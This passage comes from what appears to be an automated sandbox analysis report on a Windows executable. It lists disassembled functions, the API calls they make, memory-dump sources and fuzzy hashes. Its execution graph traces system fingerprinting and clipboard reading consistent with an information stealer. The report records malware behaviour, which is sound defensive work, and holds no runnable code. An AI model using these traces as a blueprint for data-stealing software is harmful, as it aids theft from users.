                                                                    • Instruction ID: 8559eb54f323461ba77e94ceeb161109ac5e2b5c311b6b0d5cef97f7532f813a
                                                                    • Opcode Fuzzy Hash: 270feb717a628b7ff486c7995d595feed8aaad3153d3f62910afbcedee78d1b1
                                                                    • Instruction Fuzzy Hash: 7C218B71604209AFDB64AF65CC81FEE77ADAF12364750862CF82597163EB34EC008BA0
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D4CEDC35,?,?,00000000,000C760B,000000FF,?,000BC035,00000002,?,000BC0D1,000BD3C0), ref: 000BBFA9
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000BBFBB
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,000C760B,000000FF,?,000BC035,00000002,?,000BC0D1,000BD3C0), ref: 000BBFDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: c73d7042ccc61532f9a12f7d49798426b6958b7bd0fe4e3b9cffa485b6834472
                                                                    • Instruction ID: fa453b98090d994d582c0f9d432feae15b393c203dfebff7821c6885f7612773
                                                                    • Opcode Fuzzy Hash: c73d7042ccc61532f9a12f7d49798426b6958b7bd0fe4e3b9cffa485b6834472
                                                                    • Instruction Fuzzy Hash: 22018631A4465AAFEB158F54DC09FBEBBB8FB04B14F044639F811A26D0DBB89900CF94
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 000C2FC2
                                                                    • __alloca_probe_16.LIBCMT ref: 000C308B
                                                                    • __freea.LIBCMT ref: 000C30F2
                                                                      • Part of subcall function 000C0C65: RtlAllocateHeap.NTDLL(00000000,?,-A3400188,?,000B9200,?,?,000B67E7,?,000B6199), ref: 000C0C97
                                                                    • __freea.LIBCMT ref: 000C3105
                                                                    • __freea.LIBCMT ref: 000C3112
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1423051803-0
                                                                    • Opcode ID: b35aa6d4d4943fb52d4dc2c04a7adbd5836c04e8d11c40b60d6a7325ffc39db0
                                                                    • Instruction ID: aeffb85912d4e4a95a14ccba54178ee1ff0f69c5c013868d9d50820bd1ff7bc0
                                                                    • Opcode Fuzzy Hash: b35aa6d4d4943fb52d4dc2c04a7adbd5836c04e8d11c40b60d6a7325ffc39db0
                                                                    • Instruction Fuzzy Hash: 4B51BF72610206AFEB249F65CC86FEF7AE9EF44710F29412DFD04D6152EA31DE50DAA0
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,000BE41E,?,?,00000000,00000000,00000000,?), ref: 000BE53D
                                                                    • CatchIt.LIBVCRUNTIME ref: 000BE623
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CatchEncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 1435073870-2084237596
                                                                    • Opcode ID: 2d53795fda8464a9a27be388ac6daf22e9d7dbb4f761e73f39037440362b2575
                                                                    • Instruction ID: 6e69c17c80cc26e5566d7a9cfab12cbe67320cb5379c4a83ba5f27586ae5bcc0
                                                                    • Opcode Fuzzy Hash: 2d53795fda8464a9a27be388ac6daf22e9d7dbb4f761e73f39037440362b2575
                                                                    • Instruction Fuzzy Hash: 31417A75900249AFCF26CF98CD81AEEBBB5FF48304F188059FA05A7252E735AA50DB51
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,000C2D1A,00000000,?,000D1CD0,?,?,?,000C2C51,00000004,InitializeCriticalSectionEx,000C96F8,000C9700), ref: 000C2C8B
                                                                    • GetLastError.KERNEL32(?,000C2D1A,00000000,?,000D1CD0,?,?,?,000C2C51,00000004,InitializeCriticalSectionEx,000C96F8,000C9700,00000000,?,000BE73C), ref: 000C2C95
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 000C2CBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: e57341b12df43af15086a996a352ce3333b16d6921555bd18bfb36e54ecf0d02
                                                                    • Instruction ID: 7e9723e3eade129ecb3c3e4e629d42dd36df26fcb393ff993ae5c384aa9d1851
                                                                    • Opcode Fuzzy Hash: e57341b12df43af15086a996a352ce3333b16d6921555bd18bfb36e54ecf0d02
                                                                    • Instruction Fuzzy Hash: 9FE04F30680245BBEF501B60ED4AF5C3E99AB00BA5F144435F90DA85E1E765A810D655
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(D4CEDC35,00000000,00000000,?), ref: 000C366B
                                                                      • Part of subcall function 000C2151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,000BD7D1,?,00000000,?), ref: 000C21B2
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C38BD
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000C3903
                                                                    • GetLastError.KERNEL32 ref: 000C39A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: ebd95d20d0ff444741c2b07b8947d2f96a2d3aa7558bba13b9a90997a73af006
                                                                    • Instruction ID: 5a58f5b29f5bcb7bda11c1fbfd89672ae24b917d06a1ac519db6b63ac700e657
                                                                    • Opcode Fuzzy Hash: ebd95d20d0ff444741c2b07b8947d2f96a2d3aa7558bba13b9a90997a73af006
                                                                    • Instruction Fuzzy Hash: 21D16CB5D142589FCB15CFA8D880AEDBBB5FF48314F28816EE856EB351D730AA41CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 9126e9a1538737da13031b8e1232aa841551cfe5bdd5ec6011ef2f38dedf5b56
                                                                    • Instruction ID: 07e488a72b493eaf1f6998ab53d31df5d3592bb38e762d1e66de7a4be7e5ef1e
                                                                    • Opcode Fuzzy Hash: 9126e9a1538737da13031b8e1232aa841551cfe5bdd5ec6011ef2f38dedf5b56
                                                                    • Instruction Fuzzy Hash: EC51B171615646AFEB29AF10D881BFAB7E4FF10300F14412EE90657292E7B2ED81DB51
                                                                    APIs
                                                                      • Part of subcall function 000C2151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,000BD7D1,?,00000000,?), ref: 000C21B2
                                                                    • GetLastError.KERNEL32 ref: 000C163C
                                                                    • __dosmaperr.LIBCMT ref: 000C1643
                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 000C167D
                                                                    • __dosmaperr.LIBCMT ref: 000C1684
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1913693674-0
                                                                    • Opcode ID: a682963169b7ede2beab781105329080729a5ed20c5893dc1ce6bdf1be4f9d5b
                                                                    • Instruction ID: 73f4104da19c88a089a599e7aa13533eafddf421a39d16f4a97d5bf43cb8aeec
                                                                    • Opcode Fuzzy Hash: a682963169b7ede2beab781105329080729a5ed20c5893dc1ce6bdf1be4f9d5b
                                                                    • Instruction Fuzzy Hash: 9F217C71604205AFDB20AF659881EFEB7ADEF46364B18852CF82997653DB30ED008B90
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 000C2255
                                                                      • Part of subcall function 000C2151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,000BD7D1,?,00000000,?), ref: 000C21B2
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C228D
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C22AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 158306478-0
                                                                    • Opcode ID: c1d3a0abfee4bf10c09321a4f6dd10df3e662d5f926e252b9769d1f20d138023
                                                                    • Instruction ID: 38ca8aca6460c83d917e0dfc03c226efd2e4381d5f89fbf73bb912e46920cc87
                                                                    • Opcode Fuzzy Hash: c1d3a0abfee4bf10c09321a4f6dd10df3e662d5f926e252b9769d1f20d138023
                                                                    • Instruction Fuzzy Hash: F511D2B2501555BFA72127759CCDFBF3A9CDF95395B21042DF902E1502FA24CD0295B1
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000), ref: 000C57F7
                                                                    • GetLastError.KERNEL32(?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000,?,?,?,000C3340,00000000), ref: 000C5803
                                                                      • Part of subcall function 000C5860: CloseHandle.KERNEL32(FFFFFFFE,000C5813,?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000,?,?), ref: 000C5870
                                                                    • ___initconout.LIBCMT ref: 000C5813
                                                                      • Part of subcall function 000C5835: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000C57D1,000C4F3E,?,?,000C39FA,?,00000000,00000000,?), ref: 000C5848
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000,?), ref: 000C5828
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 09a415617fc4f51d2b0c41102865806f7ee5cd54c406cc2585f76e1b0dc69c37
                                                                    • Instruction ID: 36f735df73b36cdca4c49083de7ceb5a06ab4adad3cc3f378c6df51f00f2308a
                                                                    • Opcode Fuzzy Hash: 09a415617fc4f51d2b0c41102865806f7ee5cd54c406cc2585f76e1b0dc69c37
                                                                    • Instruction Fuzzy Hash: F9F01C3A500558BBDF621F91DC08E9E7F66FF487A1F048015FE0896131CA329864DB91
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000BDD95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ___except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3493665558-3733052814
                                                                    • Opcode ID: 69a41c77cd60767d81d6b6b12fa402a506f1c27ad28741b1ae33a5fc5b01b0de
                                                                    • Instruction ID: ad727a549244f7961dc66a07be5650c369a537eef61ad8a0c26791dba8a49be4
                                                                    • Opcode Fuzzy Hash: 69a41c77cd60767d81d6b6b12fa402a506f1c27ad28741b1ae33a5fc5b01b0de
                                                                    • Instruction Fuzzy Hash: AC31D876800255EBCF266F50CC449EAFBA6FF28315B18455BF8644E111E333DC61DB81

                                                                    Execution Graph

                                                                    Execution Coverage:7.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:48.6%
                                                                    Total number of Nodes:243
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 14413 40e35b 14414 40e361 14413->14414 14415 40e370 CoUninitialize 14414->14415 14416 40e3a0 14415->14416 14161 421960 14162 4219d8 14161->14162 14167 419530 14162->14167 14164 421a84 14165 419530 LdrInitializeThunk 14164->14165 14166 421b29 14165->14166 14168 419560 14167->14168 14168->14168 14179 440480 14168->14179 14170 41962e 14171 4196ca 14170->14171 14172 41974b 14170->14172 14173 440480 LdrInitializeThunk 14170->14173 14175 419756 14170->14175 14177 419783 14170->14177 14171->14164 14189 4407b0 14172->14189 14173->14170 14175->14171 14175->14177 14183 440880 14175->14183 14177->14171 14193 43df70 LdrInitializeThunk 14177->14193 14180 4404a0 14179->14180 14180->14180 14181 4405be 14180->14181 14194 43df70 LdrInitializeThunk 14180->14194 14181->14170 14184 4408b0 14183->14184 14187 4408fe 14184->14187 14195 43df70 LdrInitializeThunk 14184->14195 14185 4409ae 14185->14177 14187->14185 14196 43df70 LdrInitializeThunk 14187->14196 14191 4407e0 14189->14191 14190 44082e 14190->14175 14191->14190 14197 43df70 LdrInitializeThunk 14191->14197 14193->14171 14194->14181 14195->14187 14196->14185 14197->14190 15494 40dd68 15499 401ba0 15494->15499 15500 401bae 15499->15500 15502 40e970 15503 40e8b8 15502->15503 15505 40e948 15503->15505 15506 43df70 LdrInitializeThunk 15503->15506 15505->15505 15506->15505 16657 40de02 16659 40de30 16657->16659 16658 40de9e 16659->16658 16661 43df70 LdrInitializeThunk 16659->16661 16661->16658 16662 440a00 16663 440a30 16662->16663 16666 440a7e 16663->16666 16668 43df70 LdrInitializeThunk 16663->16668 16664 440b2e 16666->16664 16669 43df70 LdrInitializeThunk 16666->16669 16668->16666 16669->16664 14198 40cf05 14199 40cf20 14198->14199 14204 439030 14199->14204 14201 40cf7a 14202 439030 11 API calls 14201->14202 14203 40d3ca 14202->14203 14205 439090 CoCreateInstance 14204->14205 14207 439145 SysAllocString 14205->14207 14208 439688 14205->14208 14211 4391df 14207->14211 14209 43969c GetVolumeInformationW 14208->14209 14224 4396ba 14209->14224 14212 439674 SysFreeString 14211->14212 14213 4391ea CoSetProxyBlanket 14211->14213 14212->14208 14214 43966a 14213->14214 14215 43920a SysAllocString 14213->14215 14214->14212 14217 4392e0 14215->14217 14217->14217 14218 43930d SysAllocString 14217->14218 14221 439334 14218->14221 14219 439658 SysFreeString SysFreeString 14219->14214 14220 439647 14220->14219 14221->14219 14221->14220 14222 43937f VariantInit 14221->14222 14225 4393d0 14222->14225 14223 439636 VariantClear 14223->14220 14224->14201 14225->14223 14226 40dc33 14227 40dcd0 14226->14227 14227->14227 14228 40dd4e 14227->14228 14230 43df70 LdrInitializeThunk 14227->14230 14230->14228 16878 4402c0 16880 4402e0 16878->16880 16879 44041e 16880->16879 16882 43df70 LdrInitializeThunk 16880->16882 16882->16879 14232 40e0d8 14233 40e100 14232->14233 14235 40e16e 14233->14235 14291 43df70 LdrInitializeThunk 14233->14291 14237 40e22e 14235->14237 14292 43df70 LdrInitializeThunk 14235->14292 14250 425e90 14237->14250 14239 40e29d 14258 426190 14239->14258 14241 40e2bd 14268 427e20 14241->14268 14245 40e2e6 14288 428c90 14245->14288 14247 40e2ef 14293 434470 OpenClipboard 14247->14293 14257 425f30 14250->14257 14251 4260b5 14256 421790 2 API calls 14251->14256 14252 426026 14301 421790 14252->14301 14254 426020 14254->14239 14256->14254 14257->14251 14257->14252 14257->14254 14307 440f60 14257->14307 14259 42619e 14258->14259 14340 440b70 14259->14340 14261 440f60 2 API calls 14264 425fe0 14261->14264 14262 4260b5 14267 421790 2 API calls 14262->14267 14263 426026 14266 421790 2 API calls 14263->14266 14264->14261 14264->14262 14264->14263 14265 426020 14264->14265 14265->14241 14266->14262 14267->14265 14269 4280a0 14268->14269 14270 427e4c 14268->14270 14273 4280d7 14268->14273 14279 40e2dd 14268->14279 14345 43ded0 14269->14345 14270->14269 14270->14270 14271 440f60 2 API calls 14270->14271 14270->14273 14274 440b70 LdrInitializeThunk 14270->14274 14270->14279 14271->14270 14275 440b70 LdrInitializeThunk 14273->14275 14278 43df70 LdrInitializeThunk 14273->14278 14273->14279 14351 440c80 14273->14351 14359 441580 14273->14359 14274->14270 14275->14273 14278->14273 14280 428770 14279->14280 14281 4287a0 14280->14281 14282 42882e 14281->14282 14371 43df70 LdrInitializeThunk 14281->14371 14284 43b7e0 RtlAllocateHeap 14282->14284 14287 42895e 14282->14287 14285 4288b1 14284->14285 14285->14287 14372 43df70 LdrInitializeThunk 14285->14372 14287->14245 14373 428cb0 14288->14373 14290 428c99 14290->14247 14291->14235 14292->14237 14294 40e341 14293->14294 14295 434494 GetWindowLongW GetClipboardData 14293->14295 14296 4344d1 GlobalLock 14295->14296 14297 4344cc 14295->14297 14300 4344e7 14296->14300 14298 4345db CloseClipboard 14297->14298 14298->14294 14299 4345cf GlobalUnlock 14299->14298 14300->14299 14306 4217a0 14301->14306 14302 421861 14304 42183e 14302->14304 14319 423d70 14302->14319 14304->14251 14306->14302 14306->14304 14315 440610 14306->14315 14309 440f90 14307->14309 14308 440fde 14310 43b7e0 RtlAllocateHeap 14308->14310 14312 4410ae 14308->14312 14309->14308 14338 43df70 LdrInitializeThunk 14309->14338 14313 44101f 14310->14313 14312->14257 14313->14312 14339 43df70 LdrInitializeThunk 14313->14339 14316 440630 14315->14316 14317 44075e 14316->14317 14331 43df70 LdrInitializeThunk 14316->14331 14317->14302 14320 440480 LdrInitializeThunk 14319->14320 14321 423db0 14320->14321 14327 4244c3 14321->14327 14332 43b7e0 14321->14332 14324 423dee 14330 423e7c 14324->14330 14335 43df70 LdrInitializeThunk 14324->14335 14325 43b7e0 RtlAllocateHeap 14325->14330 14326 424427 14326->14327 14337 43df70 LdrInitializeThunk 14326->14337 14327->14304 14330->14325 14330->14326 14336 43df70 LdrInitializeThunk 14330->14336 14331->14317 14333 43b800 14332->14333 14333->14333 14334 43b83f RtlAllocateHeap 14333->14334 14334->14324 14335->14324 14336->14330 14337->14326 14338->14308 14339->14312 14341 440b90 14340->14341 14343 440c4f 14341->14343 14344 43df70 LdrInitializeThunk 14341->14344 14343->14264 14344->14343 14346 43df44 14345->14346 14347 43deea 14345->14347 14348 43df3e 14345->14348 14346->14273 14347->14346 14350 43df29 RtlReAllocateHeap 14347->14350 14349 43b7e0 RtlAllocateHeap 14348->14349 14349->14346 14350->14346 14352 440cb0 14351->14352 14353 440cfe 14352->14353 14367 43df70 LdrInitializeThunk 14352->14367 14355 43b7e0 RtlAllocateHeap 14353->14355 14358 440e0f 14353->14358 14356 440d8b 14355->14356 14356->14358 14368 43df70 LdrInitializeThunk 14356->14368 14358->14273 14358->14358 14361 441591 14359->14361 14360 44163e 14362 43b7e0 RtlAllocateHeap 14360->14362 14365 4417de 14360->14365 14361->14360 14369 43df70 LdrInitializeThunk 14361->14369 14364 4416ae 14362->14364 14364->14365 14370 43df70 LdrInitializeThunk 14364->14370 14365->14273 14367->14353 14368->14358 14369->14360 14370->14365 14371->14282 14372->14287 14374 428d10 14373->14374 14374->14374 14383 43b8e0 14374->14383 14376 428d6d 14376->14290 14378 428d45 14378->14376 14381 428e66 14378->14381 14391 43bb20 14378->14391 14395 43c040 14378->14395 14382 428ece 14381->14382 14403 43bfa0 14381->14403 14382->14290 14384 43b900 14383->14384 14384->14384 14385 43b93e 14384->14385 14407 43df70 LdrInitializeThunk 14384->14407 14387 43b7e0 RtlAllocateHeap 14385->14387 14390 43ba1f 14385->14390 14388 43b9c5 14387->14388 14388->14390 14408 43df70 LdrInitializeThunk 14388->14408 14390->14378 14392 43bbce 14391->14392 14393 43bb31 14391->14393 14392->14378 14393->14392 14409 43df70 LdrInitializeThunk 14393->14409 14396 43c090 14395->14396 14402 43c0d8 14396->14402 14410 43df70 LdrInitializeThunk 14396->14410 14397 43c73e 14397->14378 14399 43c6cf 14399->14397 14411 43df70 LdrInitializeThunk 14399->14411 14401 43df70 LdrInitializeThunk 14401->14402 14402->14397 14402->14399 14402->14401 14402->14402 14404 43bfc0 14403->14404 14405 43c00e 14404->14405 14412 43df70 LdrInitializeThunk 14404->14412 14405->14381 14407->14385 14408->14390 14409->14392 14410->14402 14411->14397 14412->14405 15364 43bce0 15365 43bd5a 15364->15365 15366 43bcf2 15364->15366 15366->15365 15369 43bd52 15366->15369 15372 43df70 LdrInitializeThunk 15366->15372 15368 43bede 15368->15365 15368->15368 15374 43df70 LdrInitializeThunk 15368->15374 15369->15368 15373 43df70 LdrInitializeThunk 15369->15373 15372->15369 15373->15368 15374->15365 14136 4089a0 14137 4089af 14136->14137 14138 408cb3 ExitProcess 14137->14138 14139 4089b7 SHGetSpecialFolderPathW 14137->14139 14140 4089cd 14139->14140 14141 4089d5 GetCurrentThreadId GetCurrentProcessId 14140->14141 14142 408cae 14140->14142 14144 408a01 GetForegroundWindow 14141->14144 14145 4089fd 14141->14145 14151 43deb0 14142->14151 14146 408be0 14144->14146 14145->14144 14146->14142 14150 